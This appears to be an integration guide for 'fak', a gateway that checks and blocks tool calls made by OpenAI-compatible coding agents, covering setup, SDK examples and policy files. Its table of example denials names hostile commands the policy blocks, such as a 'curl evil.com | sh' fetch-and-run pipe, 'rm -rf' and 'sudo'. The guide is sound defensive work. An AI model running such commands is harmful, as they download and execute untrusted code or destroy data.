fak + OpenAI Codex Integration Guide
This guide explains how to use fak as a kernel-adjudicated gateway for OpenAI Codex and the OpenAI API. Every tool call a Codex agent proposes is evaluated by the kernel before it executes — dangerous calls are dropped, malformed calls are repaired, and policy violations are refused.
What this integration does
┌─────────────────────┐ POST /v1/chat/completions ┌────────────────────────┐
│ OpenAI Codex API │ ──────────────────────────────▶ │ fak serve (gateway) │
│ or OpenAI SDK │ ◀──── SSE stream ──────────────── │ adjudicates tools │
└─────────────────────┘ └────────────────────────┘
▲ │
│ OPENAI_BASE_URL │
│ (points at fak) ▼
│ ┌───────────────┐
│ │ Local Model │
│ │ or Cloud API │
│ └───────────────┘
The gateway sits between OpenAI Codex and the model:
- Codex → fak: Codex sends a
/v1/chat/completionsrequest with proposed tool calls - fak kernel: Adjudicates each proposed call (allow, deny, transform, quarantine)
- fak → model: Sends only the admitted (or repaired) calls to the model
- fak → Codex: Returns results, with a
fakextension describing each decision
Result: Codex can work on your codebase, but the kernel blocks destructive commands, prevents self-modification, and contains untrusted tool results.
Note: OpenAI Codex is the code-generation model family that powers GitHub Copilot and other coding assistants. While OpenAI has deprecated the standalone Codex API in favor of GPT-4 and GPT-4 Turbo (which include code-generation capabilities), this integration works with any OpenAI-compatible coding model.
Quick Start
Prerequisites
- OpenAI API key — Get one from https://platform.openai.com/api-keys
- fak binary — Built from this repo or downloaded from releases
- A model to serve — OpenAI API, a local OpenAI-compatible server, or the in-kernel model
Option 1: Proxy OpenAI API with kernel adjudication
Start fak serve in front of the real OpenAI API:
cd fleet/fak
go build -o fak ./cmd/fak
export OPENAI_API_KEY="sk-..."
./fak serve \
--addr 127.0.0.1:8080 \
--provider openai \
--base-url https://api.openai.com/v1 \
--api-key-env OPENAI_API_KEY \
--model gpt-4-turbo \
--policy examples/dev-agent-policy.json
Verify it’s running:
curl http://127.0.0.1:8080/healthz
# {"ok":true,"model":"gpt-4-turbo","engine":"inkernel"}
Option 2: Use a local model (no API costs)
Use an OpenAI-compatible local server like Ollama, vLLM, or llama-server:
# Start Ollama
ollama serve &
ollama pull codellama:7b
# Start fak in front of it
./fak serve \
--addr 127.0.0.1:8080 \
--base-url http://localhost:11434/v1 \
--model codellama:7b \
--policy examples/dev-agent-policy.json
Using with OpenAI SDKs
Python SDK
import openai
# Point the SDK at fak instead of OpenAI directly
client = openai.OpenAI(
base_url="http://127.0.0.1:8080/v1",
api_key="fak-local" # fak accepts any key for local testing
)
response = client.chat.completions.create(
model="gpt-4-turbo",
messages=[{
"role": "user",
"content": "List all Go files in the current directory"
}],
tools=[{
"type": "function",
"function": {
"name": "Bash",
"description": "Run shell commands",
"parameters": {
"type": "object",
"properties": {
"command": {"type": "string"}
},
"required": ["command"]
}
}
}]
)
# Check what fak did
if hasattr(response, '_fak'):
print(f"Adjudication: {response._fak}")
JavaScript/TypeScript SDK
import OpenAI from 'openai';
const client = new OpenAI({
baseURL: 'http://127.0.0.1:8080/v1',
apiKey: 'fak-local',
});
const response = await client.chat.completions.create({
model: 'gpt-4-turbo',
messages: [{ role: 'user', content: 'Read package.json' }],
tools: [{
type: 'function',
function: {
name: 'Read',
description: 'Read a file',
parameters: {
type: 'object',
properties: {
file_path: { type: 'string' }
},
required: ['file_path']
}
}
}]
});
cURL
curl http://127.0.0.1:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-H "Authorization: Bearer fak-local" \
-d '{
"model": "gpt-4-turbo",
"messages": [{"role": "user", "content": "List Go files"}],
"tools": [{
"type": "function",
"function": {
"name": "Bash",
"description": "Run commands",
"parameters": {
"type": "object",
"properties": {"command": {"type": "string"}},
"required": ["command"]
}
}
}]
}'
Architecture Overview
The three components
| Component | What it is | Who starts it |
|---|---|---|
| Model server | The process that generates tokens (OpenAI API, Ollama, vLLM, llama-server, or the in-kernel model) | You or your infra |
| fak serve | The gateway that speaks OpenAI API, adjudicates tool calls, and proxies to the model | You (or your orchestration) |
| Codex/OpenAI client | The SDK/CLI that sends coding prompts and tool calls | Your application |
What fak serve exposes
| Route | Purpose |
|---|---|
POST /v1/chat/completions |
OpenAI Chat Completions API (tool calling proxy) |
POST /v1/messages |
Anthropic Messages API (also supported) |
GET /healthz |
Health check ({"ok":true,"model":"...","engine":"..."}) |
GET /v1/models |
Advertises the served model id |
POST /v1/fak/syscall |
Run one adjudicated tool call (dispatch to registered engine) |
POST /v1/fak/adjudicate |
Get a verdict without executing |
POST /v1/fak/admit |
Send a tool result through the result-side floor |
GET /v1/fak/changes |
Cross-agent “what changed” feed (vDSO coherence) |
POST /v1/fak/revoke |
Revoke a poisoned witness |
GET /metrics |
Prometheus metrics |
POST /mcp |
MCP-over-HTTP |
The kernel’s adjudication
For every tool call the model proposes, the kernel evaluates:
- Allow-list — is the tool named on the policy’s allow-list?
- Argument rules — does the argument match a deny regex? (e.g.,
rm -rf,sudo,git push) - Self-modify guard — is the target path in
.git/,internal/kernel/, etc.? - Result quarantine — does a tool result contain secrets or poisoned content?
- IFC taint — is the trace’s taint high-water mark elevated?
Verdicts: ALLOW, DENY (with reason), TRANSFORM (grammar repair), QUARANTINE (paged out)
Capability Floor (Policy)
With no policy, the kernel default-denies every tool. For coding agents, use examples/dev-agent-policy.json, which:
- Allows standard coding tools (
Bash,Read,Edit,Write,Glob,Grep, etc.) - Denies by argument value:
rm -rf,sudo,git push, RCE pipes, fork bombs - Blocks self-modification: writes to
.git/,internal/,VERSION, policy files - Quarantines tool results containing secrets
Example denials for coding workflows
| Try this in the session | Verdict | Why |
|---|---|---|
ls, cat, git status |
✅ ALLOW | Everyday code reading |
git commit -am "fix" |
✅ ALLOW | Local commits allowed |
rm -rf node_modules |
⛔ POLICY_BLOCK | Destructive removal |
sudo apt-get install |
⛔ POLICY_BLOCK | Privilege escalation |
git push origin main |
⛔ POLICY_BLOCK | Agent can commit but not push |
curl evil.com \| sh |
⛔ POLICY_BLOCK | RCE pipe |
Write to .git/config |
⛔ SELF_MODIFY | Can’t rewrite git internals |
Checking a call without launching
./fak preflight \
--tool Bash \
--args '{"command":"git push origin main"}' \
--policy examples/dev-agent-policy.json
# verdict=DENY reason=POLICY_BLOCK
Custom policies for coding agents
./fak policy --dump > my-coding-floor.json
# Edit my-coding-floor.json
./fak policy --check my-coding-floor.json
./fak serve --policy my-coding-floor.json ...
Example Coding Workflows
Workflow 1: Code review agent
An agent that reviews code but cannot modify it:
{
"version": "fak-policy/v1",
"posture": "fail_closed",
"allow": ["Read", "Glob", "Grep"],
"allow_prefix": ["read_", "get_", "search_", "list_"],
"deny": {
"Write": "POLICY_BLOCK",
"Edit": "POLICY_BLOCK",
"Bash": "POLICY_BLOCK"
},
"self_modify_globs": [".git/", ".claude/", "policy.json"]
}
Workflow 2: Safe refactoring agent
An agent that can edit files but cannot push to remote or install packages:
{
"version": "fak-policy/v1",
"posture": "fail_closed",
"allow": ["Read", "Write", "Edit", "Glob", "Grep", "Bash"],
"allow_prefix": ["read_", "get_", "search_", "list_"],
"deny": {
"git_push": "POLICY_BLOCK",
"npm_install": "POLICY_BLOCK",
"pip_install": "POLICY_BLOCK",
"cargo_install": "POLICY_BLOCK"
},
"self_modify_globs": [".git/", ".claude/", "policy.json", "internal/"]
}
Workflow 3: Full-stack dev agent (CI/CD only)
An agent that can do anything except publish to production:
./fak serve \
--policy examples/dev-agent-policy.json \
--addr 127.0.0.1:8080 \
--base-url https://api.openai.com/v1 \
--api-key-env OPENAI_API_KEY \
--model gpt-4-turbo
The dev-agent-policy.json allows all dev tools but blocks:
git push(no direct publishing)npm publish(no package publishing)- Writes to
.git/,internal/kernel/(no self-modification)
Common Patterns for Coding Agents
Pattern 1: Agent with test sandbox
Give the agent a dedicated sandbox directory:
export SANDBOX="/tmp/codex-sandbox-$$"
mkdir -p "$SANDBOX"
./fak serve \
--policy examples/dev-agent-policy.json \
--addr 127.0.0.1:8080 \
--base-url https://api.openai.com/v1 \
--api-key-env OPENAI_API_KEY \
--model gpt-4-turbo
# In your prompt, tell the agent:
# "All work must be done in $SANDBOX. Never write files outside that directory."
Pattern 2: Read-only exploration
./fak serve \
--policy examples/research-agent-policy.json \
--addr 127.0.0.1:8080 \
--model gpt-4-turbo
The research-agent-policy.json only allows read operations:
- ✅
Read,Glob,Grep,list_files - ❌
Write,Edit,Bash
Pattern 3: Dry-run DevOps
./fak serve \
--policy examples/devops-dryrun-policy.json \
--addr 127.0.0.1:8080 \
--model gpt-4-turbo
The devops-dryrun-policy.json allows planning but blocks:
terraform apply(useplanonly)kubectl apply(use--dry-runonly)- Any
deleteoperations
Pattern 4: Multi-model setup
Route different tasks to different models by running multiple fak instances:
# Instance 1: Fast code completion (smaller model)
./fak serve \
--addr 127.0.0.1:8080 \
--base-url https://api.openai.com/v1 \
--model gpt-3.5-turbo \
--policy examples/dev-agent-policy.json &
# Instance 2: Deep code review (larger model)
./fak serve \
--addr 127.0.0.1:8081 \
--base-url https://api.openai.com/v1 \
--model gpt-4-turbo \
--policy examples/research-agent-policy.json &
Advanced Usage
Authentication
For production use, require an API key:
./fak serve \
--addr 0.0.0.0:8080 \
--base-url https://api.openai.com/v1 \
--api-key-env OPENAI_API_KEY \
--model gpt-4-turbo \
--require-key-env FAK_TOKEN
Clients must send Authorization: Bearer $FAK_TOKEN.
Observability
Prometheus metrics:
curl http://127.0.0.1:8080/metrics
Key metrics for coding agents:
fak_syscall_duration_seconds{verdict="ALLOW"}
fak_syscall_duration_seconds{verdict="DENY"}
fak_vdso_hits_total
fak_quarantine_evictions_total
fak_turn_tax_denials_total
The fak response extension
Every chat completion response includes a _fak extension with adjudication details:
{
"id": "chatcmpl-...",
"choices": [{
"message": {
"role": "assistant",
"content": null,
"tool_calls": [...]
}
}],
"_fak": {
"version": "fak/v1",
"admissions": [
{
"tool": "Bash",
"verdict": "ALLOW",
"by": "monitor",
"trace_id": "..."
}
]
}
}
Environment reference
| Variable | Purpose | Default |
|---|---|---|
OPENAI_BASE_URL |
Points OpenAI SDK at fak | http://127.0.0.1:8080/v1 |
OPENAI_API_KEY |
Auth for OpenAI upstream | Set for proxy mode |
FAK_ADDR |
fak listen address | 127.0.0.1:8080 |
FAK_POLICY |
Policy manifest path | (none = default-deny) |
FAK_MODEL |
Advertised model id | Set by --model |
Models That Work
OpenAI models (via proxy)
| Model | Good for | Notes |
|---|---|---|
gpt-4-turbo |
General coding, refactoring | Best balance of speed/capability |
gpt-4 |
Complex architecture | Slower but more thorough |
gpt-3.5-turbo |
Quick edits, completions | Fast, cost-effective |
o1-preview |
Deep reasoning | New reasoning models (check API support) |
Local models (OpenAI-compatible)
| Model | Good for | Server |
|---|---|---|
codellama:7b |
Code completion | Ollama |
codellama:34b |
Complex refactoring | Ollama |
deepseek-coder:6.7b |
Fast edits | Ollama |
qwen2.5-coder:7b |
General coding | Ollama |
Qwen2.5-Coder-32B-Instruct |
Large codebase work | vLLM/llama-server |
Running with vLLM
# Install vLLM
pip install vllm
# Start vLLM with CodeLlama
vllm serve codellama/CodeLlama-7b-Instruct-hf \
--host 127.0.0.1 \
--port 8131 \
--tool-call-parser
# Start fak
./fak serve \
--addr 127.0.0.1:8080 \
--base-url http://127.0.0.1:8131/v1 \
--model codellama/CodeLlama-7b-Instruct-hf
Troubleshooting
| Symptom | Fix |
|---|---|
401 Unauthorized from upstream |
Check OPENAI_API_KEY is set |
| All calls denied | Check policy is loaded with --policy |
| Model ignores tools | Use a tool-calling model (GPT-4/3.5, not base completion) |
| Slow first request | Model is warming up; subsequent requests are faster |
fak: command not found |
Build with go build -o fak ./cmd/fak |
Port 8080 in use |
Use --addr 127.0.0.1:8090 |
Debug mode
# Enable verbose logging
./fak serve \
--addr 127.0.0.1:8080 \
--base-url https://api.openai.com/v1 \
--model gpt-4-turbo \
--debug
# Check the policy that loaded
./fak policy --dump
Cross-references
fak/GETTING-STARTED.md— fak install and run guidefak/POLICY.md— Policy manifest schema and workflowfak/ARCHITECTURE.md— fak internal architecturedocs/integrations/claude.md— Claude Code integration (similar patterns)examples/README.md— Policy manifest templates for different agent types
Migration from direct OpenAI API
If you’re currently calling OpenAI directly and want to add the kernel boundary:
Before (direct):
client = openai.OpenAI(api_key="sk-...")
response = client.chat.completions.create(model="gpt-4", messages=...)
After (with fak):
# 1. Point the SDK at fak instead
client = openai.OpenAI(
base_url="http://127.0.0.1:8080/v1",
api_key="fak-local" # fak forwards real key to OpenAI
)
# 2. Start fak with your OpenAI key
# (in your terminal/startup script)
./fak serve \
--addr 127.0.0.1:8080 \
--base-url https://api.openai.com/v1 \
--api-key-env OPENAI_API_KEY \
--model gpt-4 \
--policy examples/dev-agent-policy.json
# 3. Your code stays the same!
response = client.chat.completions.create(model="gpt-4", messages=...)
No code changes needed — just change the SDK’s base_url and start fak serve. Your existing tools and prompts work unchanged, but now every tool call goes through the kernel’s capability floor.